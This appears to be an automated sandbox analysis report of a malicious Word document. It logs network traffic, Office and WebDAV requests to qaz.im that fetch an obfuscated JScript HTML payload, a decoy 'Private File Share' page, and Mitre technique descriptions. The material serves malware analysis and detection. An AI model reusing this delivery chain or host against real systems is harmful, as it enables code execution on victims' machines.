Sep 2, 2022 13:24:23.005239964 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.127108097 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.127208948 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.133275986 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.133318901 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.134169102 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.135266066 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.175379038 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.289026022 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.289143085 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.289319038 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.289421082 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.289455891 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.289505005 CEST	49175	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.289520979 CEST	443	49175	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.289912939 CEST	49176	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.289964914 CEST	443	49176	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.290060043 CEST	49176	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.290260077 CEST	49176	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.290277004 CEST	443	49176	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.410973072 CEST	443	49176	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.411715031 CEST	49176	443	192.168.2.22	82.202.173.45
Sep 2, 2022 13:24:23.411742926 CEST	443	49176	82.202.173.45	192.168.2.22
Sep 2, 2022 13:24:23.413580894 CEST	49176	443	192.168.2.22	82.202.173.45

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2022 13:24:11.853436947 CEST	55868	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:11.871222019 CEST	53	55868	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:18.633838892 CEST	49688	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:18.653536081 CEST	53	49688	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:18.659006119 CEST	58836	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:18.722076893 CEST	53	58836	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:22.043364048 CEST	50134	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:22.110351086 CEST	53	50134	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:22.122073889 CEST	55275	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:22.185585976 CEST	53	55275	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:22.896694899 CEST	59915	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:22.916980028 CEST	53	59915	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:22.924175978 CEST	54408	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:23.003745079 CEST	53	54408	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:26.515650988 CEST	50108	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:26.535551071 CEST	53	50108	8.8.8.8	192.168.2.22
Sep 2, 2022 13:24:26.538368940 CEST	54723	53	192.168.2.22	8.8.8.8
Sep 2, 2022 13:24:26.556077957 CEST	53	54723	8.8.8.8	192.168.2.22

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:12 UTC	0	OUT	OPTIONS /load/diy5AH/ HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: qaz.im Content-Length: 0 Connection: Keep-Alive
2022-09-02 11:24:12 UTC	0	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 02 Sep 2022 11:24:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.27 Set-Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://qaz.im/index.php?a=download&q=file_not_exist

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:18 UTC	0	OUT	HEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1 Connection: Keep-Alive Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4 User-Agent: Microsoft Office Existence Discovery Host: qaz.im
2022-09-02 11:24:19 UTC	0	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 02 Sep 2022 11:24:18 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 19364 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.27 Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Transfer-Encoding: binary Content-Disposition: attachment;filename="1024203777.test.html"

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:25 UTC	22	OUT	GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: qaz.im Connection: Keep-Alive Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:25 UTC	23	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 02 Sep 2022 11:24:25 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 19364 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.27 Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Transfer-Encoding: binary Content-Disposition: attachment;filename="1024203777.test.html"
2022-09-02 11:24:25 UTC	23	IN	Data Raw: 3c 21 64 6f 63 54 59 70 65 20 48 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 6c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 43 72 69 50 54 20 4c 61 6e 47 75 61 67 45 3d 22 6a 53 43 72 69 70 74 22 3e 0d 0a 0d 0a 2f 2f 41 76 39 47 77 56 76 5a 50 46 63 77 35 35 68 37 58 76 71 36 65 69 4e 77 33 33 77 6e 31 6b 4c 4d 4d 74 67 4b 6c 78 6d 48 4a 4c 71 6c 42 30 46 62 6b 53 70 53 6c 76 36 68 76 73 35 55 66 65 32 32 35 53 67 46 4a 58 5a 57 75 64 69 72 6c 6c 58 38 31 31 75 69 4c 78 64 4b 56 72 31 30 33 62 71 61 50 57 51 39 35 63 31 77 44 32 58 4d 4c 6c 4b 4e 4f 59 4f 34 77 43 6a 52 6f 74 33 58 68 30 5a 68 4c 7a 43 45 64 64 79 42 48 52 61 52 53 50 50 30 74 78 58 66 35 35 43 6a 73 74 52 43 41 47 78 30 75 6d 49 63 55 79 41 76 37 6c 39 45 64 37 5a 65 59 36 64 64 49 7a 6f Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
2022-09-02 11:24:25 UTC	39	IN	Data Raw: 64 62 31 6e 58 55 6b 61 50 4b 37 37 44 33 71 56 63 52 38 52 61 50 73 61 45 52 36 43 71 53 65 31 48 6c 41 50 54 4b 4a 6c 4a 49 39 39 68 6f 76 41 72 76 79 36 7a 77 78 4c 30 75 46 30 64 51 6a 6e 6f 59 67 43 39 42 7a 6f 73 58 64 33 70 72 4d 30 70 58 64 61 45 48 72 72 6d 66 6f 70 66 78 4e 39 72 30 53 51 6a 64 44 55 6c 34 56 36 6d 6b 5a 70 38 4b 30 39 51 78 30 75 42 6a 68 76 34 61 7a 72 36 39 50 50 4c 42 4e 62 63 76 64 61 67 30 77 4e 54 4c 30 35 6b 56 6d 48 75 38 6f 62 30 70 78 69 42 31 52 4f 41 4d 74 76 37 38 78 6d 68 38 73 54 54 61 58 68 4d 52 63 6b 61 76 33 38 65 46 6a 55 6c 65 53 66 4d 68 39 45 74 6b 4c 78 30 68 6e 72 6e 36 57 45 50 4a 76 35 73 36 4b 6e 39 4c 66 77 56 34 4d 58 33 6b 61 49 62 6c 6b 50 6a 44 37 4c 36 76 70 7a 33 65 35 35 52 69 5a 72 65 65 43 Data Ascii: db1nXUkaPK77D3qVcR8RaPsaER6CqSe1HlAPTKJlJI99hovArvy6zwxL0uF0dQjnoYgC9BzosXd3prM0pXdaEHrrmfopfxN9r0SQjdDUl4V6mkZp8K09Qx0uBjhv4azr69PPLBNbcvdag0wNTL05kVmHu8ob0pxiB1ROAMtv78xmh8sTTaXhMRckav38eFjUleSfMh9EtkLx0hnrn6WEPJv5s6Kn9LfwV4MX3kaIblkPjD7L6vpz3e55RiZreeC

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:26 UTC	43	OUT	OPTIONS /load/diy5AH/ HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: qaz.im Content-Length: 0 Connection: Keep-Alive Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:26 UTC	43	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 02 Sep 2022 11:24:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://qaz.im/index.php?a=download&q=file_not_exist

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:27 UTC	44	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 6c 6f 61 64 2f 64 69 79 35 41 48 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a Data Ascii: PROPFIND /load/diy5AH HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:27 UTC	44	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 02 Sep 2022 11:24:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://qaz.im/index.php?a=download&q=file_not_exist

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:27 UTC	50	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 3f 61 3d 64 6f 77 6e 6c 6f 61 64 26 71 3d 66 69 6c 65 5f 6e 6f 74 5f 65 78 69 73 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a Data Ascii: PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:28 UTC	50	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 02 Sep 2022 11:24:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4473 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache
2022-09-02 11:24:28 UTC	50	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:28 UTC	74	OUT	HEAD /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: qaz.im Content-Length: 0 Connection: Keep-Alive Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:29 UTC	74	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 02 Sep 2022 11:24:29 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 19364 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.27 Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Transfer-Encoding: binary Content-Disposition: attachment;filename="1024203777.test.html"

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:22 UTC	1	OUT	OPTIONS /load/diy5AH HTTP/1.1 Connection: Keep-Alive Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4 User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: qaz.im
2022-09-02 11:24:22 UTC	1	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 02 Sep 2022 11:24:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://qaz.im/index.php?a=download&q=file_not_exist

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:58 UTC	94	OUT	GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: qaz.im Connection: Keep-Alive Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:58 UTC	95	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 02 Sep 2022 11:24:58 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 19364 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.27 Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Transfer-Encoding: binary Content-Disposition: attachment;filename="1024203777.test.html"
2022-09-02 11:24:58 UTC	95	IN	Data Raw: 3c 21 64 6f 63 54 59 70 65 20 48 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 6c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 43 72 69 50 54 20 4c 61 6e 47 75 61 67 45 3d 22 6a 53 43 72 69 70 74 22 3e 0d 0a 0d 0a 2f 2f 41 76 39 47 77 56 76 5a 50 46 63 77 35 35 68 37 58 76 71 36 65 69 4e 77 33 33 77 6e 31 6b 4c 4d 4d 74 67 4b 6c 78 6d 48 4a 4c 71 6c 42 30 46 62 6b 53 70 53 6c 76 36 68 76 73 35 55 66 65 32 32 35 53 67 46 4a 58 5a 57 75 64 69 72 6c 6c 58 38 31 31 75 69 4c 78 64 4b 56 72 31 30 33 62 71 61 50 57 51 39 35 63 31 77 44 32 58 4d 4c 6c 4b 4e 4f 59 4f 34 77 43 6a 52 6f 74 33 58 68 30 5a 68 4c 7a 43 45 64 64 79 42 48 52 61 52 53 50 50 30 74 78 58 66 35 35 43 6a 73 74 52 43 41 47 78 30 75 6d 49 63 55 79 41 76 37 6c 39 45 64 37 5a 65 59 36 64 64 49 7a 6f Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
2022-09-02 11:24:58 UTC	111	IN	Data Raw: 64 62 31 6e 58 55 6b 61 50 4b 37 37 44 33 71 56 63 52 38 52 61 50 73 61 45 52 36 43 71 53 65 31 48 6c 41 50 54 4b 4a 6c 4a 49 39 39 68 6f 76 41 72 76 79 36 7a 77 78 4c 30 75 46 30 64 51 6a 6e 6f 59 67 43 39 42 7a 6f 73 58 64 33 70 72 4d 30 70 58 64 61 45 48 72 72 6d 66 6f 70 66 78 4e 39 72 30 53 51 6a 64 44 55 6c 34 56 36 6d 6b 5a 70 38 4b 30 39 51 78 30 75 42 6a 68 76 34 61 7a 72 36 39 50 50 4c 42 4e 62 63 76 64 61 67 30 77 4e 54 4c 30 35 6b 56 6d 48 75 38 6f 62 30 70 78 69 42 31 52 4f 41 4d 74 76 37 38 78 6d 68 38 73 54 54 61 58 68 4d 52 63 6b 61 76 33 38 65 46 6a 55 6c 65 53 66 4d 68 39 45 74 6b 4c 78 30 68 6e 72 6e 36 57 45 50 4a 76 35 73 36 4b 6e 39 4c 66 77 56 34 4d 58 33 6b 61 49 62 6c 6b 50 6a 44 37 4c 36 76 70 7a 33 65 35 35 52 69 5a 72 65 65 43 Data Ascii: db1nXUkaPK77D3qVcR8RaPsaER6CqSe1HlAPTKJlJI99hovArvy6zwxL0uF0dQjnoYgC9BzosXd3prM0pXdaEHrrmfopfxN9r0SQjdDUl4V6mkZp8K09Qx0uBjhv4azr69PPLBNbcvdag0wNTL05kVmHu8ob0pxiB1ROAMtv78xmh8sTTaXhMRckav38eFjUleSfMh9EtkLx0hnrn6WEPJv5s6Kn9LfwV4MX3kaIblkPjD7L6vpz3e55RiZreeC

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:22 UTC	1	OUT	OPTIONS /index.php?a=download&q=file_not_exist HTTP/1.1 Connection: Keep-Alive Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4 User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601 translate: f Host: qaz.im
2022-09-02 11:24:22 UTC	1	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 02 Sep 2022 11:24:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4473 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache
2022-09-02 11:24:22 UTC	2	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:23 UTC	6	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 6c 6f 61 64 2f 64 69 79 35 41 48 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a Data Ascii: PROPFIND /load/diy5AH HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:23 UTC	6	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 02 Sep 2022 11:24:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://qaz.im/index.php?a=download&q=file_not_exist

Timestamp	kBytes transferred	Direction	Data
2022-09-02 11:24:24 UTC	12	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 3f 61 3d 64 6f 77 6e 6c 6f 61 64 26 71 3d 66 69 6c 65 5f 6e 6f 74 5f 65 78 69 73 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a Data Ascii: PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:24 UTC	12	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 02 Sep 2022 11:24:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4473 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.4.27 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache
2022-09-02 11:24:24 UTC	13	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href

Target ID:	0
Start time:	13:23:18
Start date:	02/09/2022
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f860000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
